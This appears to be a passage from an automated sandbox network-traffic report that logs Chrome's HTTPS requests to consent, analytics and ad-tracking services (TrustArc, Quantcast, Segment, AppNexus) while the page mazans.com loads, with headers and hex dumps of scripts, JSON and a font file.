                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &&(t.prodid=t.ecomm_prodid,delete t.ecomm_prodid);t.hasOwnProperty("ecomm_pagetype")>0&&(t.pagetype=t.ecomm_pagetype,delete t.ecomm_pagetype);t.hasOwnProperty("pagetype")&&(t.pagetype==null||t.pagetype.toString()==="")&&delete t.pagetype;t.hasOwnProperty(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC8192INData Raw: 76 61 72 20 69 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 6e 29 3b 72 65 74 75 72 6e 20 69 2e 61 6c 74 26 26 64 65 6c 65 74 65 20 69 2e 61 6c 74 2c 74 68 69 73 2e 63 6c 6f 6e 65 28 74 2c 69 29 7d 3b 74 68 69 73 2e 66 69 72 65 42 65 61 63 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 69 2c 73 2c 65 3d 74 68 69 73 2e 67 65 74 43 6c 55 72 6c 28 74 68 69 73 2e 75 72 6c 50 72 65 66 69 78 29 2c 74 3d 74 68 69 73 2e 63 6f 6d 62 69 6e 65 28 74 68 69 73 2e 62 65 61 63 6f 6e 50 61 72 61 6d 73 2c 6e 29 2c 72 3d 74 68 69 73 2e 73 74 72 69 6e 67 69 66 79 54 6f 52 65 71 75 65 73 74 28 74 29 2c 66 3d 74 68 69 73 2e 72 65 6d 6f 76 65 54 72 61 69 6c 69 6e 67 41 6d 70 28 65 2b 72 29 2c 6f 3d 5b 22 72 22 2c 22 65 6c 32 22 2c 22 65 63 32 22 2c 22 65 61 32 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var i=this.clone(n);return i.alt&&delete i.alt,this.clone(t,i)};this.fireBeacon=function(n){for(var i,s,e=this.getClUrl(this.urlPrefix),t=this.combine(this.beaconParams,n),r=this.stringifyToRequest(t),f=this.removeTrailingAmp(e+r),o=["r","el2","ec2","ea2"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC2609INData Raw: 6f 6d 6d 5f 74 6f 74 61 6c 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 55 61 73 50 72 6f 64 75 63 74 73 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 61 5f 65 22 3a 74 68 69 73 2e 6d 61 70 47 74 6d 45 63 6f 6d 6d 65 72 63 65 50 75 72 63 68 61 73 65 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 67 61 34 22 3a 74 68 69 73 2e 72 65 70 6c 61 63 65 47 74 6d 50 61 72 61 6d 28 6e 2c 22 76 61 6c 75 65 22 2c 22 65 76 65 6e 74 5f 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 47 61 34 49 74 65 6d 73 28 6e 29 7d 72 65 74 75 72 6e 20 6e 7d 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 55 72 6c 43 68 61 6e 67 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: omm_totalvalue");this.mapGtmUasProducts(n);break;case"ua_e":this.mapGtmEcommercePurchase(n);break;case"ga4":this.replaceGtmParam(n,"value","event_value");this.mapGtmGa4Items(n)}return n};var t=window.location.href;this.documentUrlChanged=function(){var n=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          47192.168.2.174984713.225.78.534436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC506OUTGET /log?domain=sendgrid.com&country=us&state=&behavior=implied&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&c=a562&referer=https://mazans.com&language=en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 debe291145dc27044f50d04bac101cd8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: DApDDpiUHOduOhMsjgQHOZFN_WD30Dh-krx61H2G66yMArVzI1CcdA==
                                                                                                                                                                                                                                                                                                                                                                          Age: 1
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          48192.168.2.174984291.228.74.1664436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC542OUTGET /aquant.js?a=p-de_F6qVUp9bug HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: secure.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC295INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 23145
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=604800
                                                                                                                                                                                                                                                                                                                                                                          Etag: "mLYq618hJoRcW1Crupr2OQ=="
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 20 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16089INData Raw: 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 33 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 75 61 6e 74 63 61 73 74 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 71 63 53 65 73 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 72 28 29 3b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 28 65 2b 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 25 31 36 7c 30 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC7056INData Raw: 31 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 3f 5a 28 65 29 3a 5f 28 65 2c 21 30 29 2c 6f 3d 21 30 7d 2c 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 28 74 3d 44 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 5b 65 5d 2c 30 29 29 2e 73 70 6c 69 63 65 28 31 2c 30 2c 6e 29 2c 4a 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 3b 72 3d 21 31 2c 71 65 26 26 4b 28 29 7d 72 65 74 75 72 6e 20 6f 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 61 2c 69 2c 63 2c 75 2c 73 3d 5b 5d 2c 6c 3d 5b 5d 2c 66 3d 74 7c 7c 5f 3b 69 66 28 28 72 3d 44 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 32 29 29 26 26 72 2e 6c 65 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1;if(arguments.length){for(n=function(e){r?Z(e):_(e,!0),o=!0},e=0;e<arguments.length;e++)(t=De.call(arguments[e],0)).splice(1,0,n),J.apply(null,t);r=!1,qe&&K()}return o},J=function(e,t){var n,r,o,a,i,c,u,s=[],l=[],f=t||_;if((r=De.call(arguments,2))&&r.len


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          49192.168.2.174985499.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC392OUTGET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settings HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 726
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 25 Jul 2024 18:51:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: 6gO29ZVhFg1WEwgot.7OvkeUMt5RLeki
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                                                                                                                          ETag: "b78f37c2b9d6dae1a4e8aa118b9b553f"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 94faae20b0f122c4555025f52a2fd744.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: O2ksS3wbNeP10rtbexD5EU9KGQSvNfOkCuLPzAjzfOxDw7L11kTIgw==
                                                                                                                                                                                                                                                                                                                                                                          Age: 1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC726INData Raw: 7b 22 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 7b 22 52 65 70 65 61 74 65 72 22 3a 7b 22 76 65 72 73 69 6f 6e 53 65 74 74 69 6e 67 73 22 3a 7b 22 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 73 22 3a 5b 22 73 65 72 76 65 72 22 5d 7d 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 7d 2c 22 53 65 67 6d 65 6e 74 2e 69 6f 22 3a 7b 22 61 70 69 4b 65 79 22 3a 22 31 43 6a 6e 42 4e 50 79 62 57 7a 79 76 31 30 73 73 5a 52 78 64 77 6d 62 38 76 72 59 46 34 79 6a 22 2c 22 75 6e 62 75 6e 64 6c 65 64 49 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 5b 22 4d 61 72 6b 65 74 6f 20 56 32 22 5d 2c 22 61 64 64 42 75 6e 64 6c 65 64 4d 65 74 61 64 61 74 61 22 3a 74 72 75 65 2c 22 6d 61 79 62 65 42 75 6e 64 6c 65 64 43 6f 6e 66 69 67 49 64 73 22 3a 7b 7d 2c 22 76 65 72 73 69 6f 6e 53 65 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"integrations":{"Repeater":{"versionSettings":{"componentTypes":["server"]},"type":"server"},"Segment.io":{"apiKey":"1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj","unbundledIntegrations":["Marketo V2"],"addBundledMetadata":true,"maybeBundledConfigIds":{},"versionSet


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          50192.168.2.1749846185.89.210.1414436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC347OUTGET /getuidj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: secure.adnxs.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, private
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                                          AN-X-Request-Uuid: 783d380a-2ae1-4485-a700-4507bc62f303
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Wed, 01-Nov-2034 16:29:14 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                                                                                                                                                                                                                          X-Proxy-Origin: 173.254.250.82; 173.254.250.82; 950.bm-nginx-loadbalancer.mgmt.ams3.adnexus.net; adnxs.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC11INData Raw: 7b 22 75 69 64 22 3a 22 30 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"uid":"0"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          51192.168.2.174985913.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC562OUTGET /get?name=Whitney-Book.otf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 27108
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 e5b747ffd1713cb17ddd7d55234a3300.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: dwX5lzmz-Aj2TRAS9psNS6PMlhRn4zp7jTQCoQYBqibKmm3fFcJRQQ==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 4f 54 54 4f 00 0a 00 80 00 03 00 20 43 46 46 20 a7 2e 1a 16 00 00 00 ac 00 00 43 c7 47 50 4f 53 e3 db e2 c7 00 00 48 b8 00 00 19 74 4f 53 2f 32 33 4d 38 30 00 00 69 58 00 00 00 60 63 6d 61 70 8a e2 be d6 00 00 44 74 00 00 04 42 68 65 61 64 e7 68 0a 34 00 00 62 30 00 00 00 36 68 68 65 61 07 36 03 e0 00 00 62 68 00 00 00 24 68 6d 74 78 f6 66 35 0f 00 00 62 90 00 00 03 d8 6d 61 78 70 00 f6 50 00 00 00 66 6c 00 00 00 06 6e 61 6d 65 7e 64 9a 32 00 00 66 74 00 00 02 e2 70 6f 73 74 ff 7e 00 14 00 00 69 bc 00 00 00 20 01 00 04 04 00 01 01 01 0d 57 68 69 74 6e 65 79 2d 42 6f 6f 6b 00 01 02 00 01 00 3a f8 0f 00 f8 1b 01 f8 1c 02 f8 1d 03 f8 17 04 fb 19 0c 03 9f 0c 04 1d 00 4d d2 36 0d 3f fb 5c fa 68 fa 3f 05 1c 01 5f 0f 1c 00 00 10 1c 03 4a 11 1c 00 25 1d 00 00 43
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: OTTO CFF .CGPOSHtOS/23M80iX`cmapDtBheadh4b06hhea6bh$hmtxf5bmaxpPflname~d2ftpost~i Whitney-Book:M6?\h?_J%C
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC10724INData Raw: 46 07 46 06 fd 46 07 f7 39 f9 79 15 28 f7 20 05 4e 06 22 fb 25 05 b5 06 e7 de 05 ea 35 05 0e fb 8a f7 3c 16 f9 46 07 46 06 fd 46 07 f7 37 f9 85 15 e3 07 38 06 33 07 31 16 e3 07 39 06 33 07 0e fb 8a f7 3c 16 f9 46 07 46 06 fd 46 07 c6 f9 7e 15 2b f7 2d 05 35 78 05 f7 1c fb 1a 05 0e f7 7b f8 99 fa 0d 15 35 9e 05 2a fb 2d 05 b9 06 f7 c4 fc 2d 15 f7 67 fb 11 f7 26 fb 4e 1e fb 4c fb 14 fb 27 fb 68 1f fb 67 f7 12 fb 26 f7 4c 1e f7 4e f7 13 f7 28 f7 67 1f 44 89 15 fb 43 2c fb 0c fb 25 1e fb 25 2b f7 0c f7 45 1f f7 43 ea f7 0c f7 25 1e f7 25 eb fb 0c fb 45 1f 0e f7 7b f9 40 f7 ee 15 f7 67 fb 11 f7 26 fb 4e 1e fb 4c fb 14 fb 27 fb 68 1f fb 67 f7 12 fb 26 f7 4c 1e f7 4e f7 13 f7 28 f7 67 1f 44 89 15 fb 43 2c fb 0c fb 25 1e fb 25 2b f7 0c f7 45 1f f7 43 ea f7 0c f7
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: FFF9y( N"%5<FFF783193<FFF~+-5x{5*--g&NL'hg&LN(gDC,%%+EC%%E{@g&NL'hg&LN(gDC,%%+EC


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          52192.168.2.174985713.225.78.534436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC370OUTGET /asset/notice.js/v/v1.7-776 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 96983
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 13 Nov 2024 02:26:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:25:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 a10d58b5ce965502cc34c5b27682fe22.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 5wdxYMt_F7ZVMbeOTe9PHovslxsCoFhO4fWhucTflHMFS0VIo3Utrg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 366
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
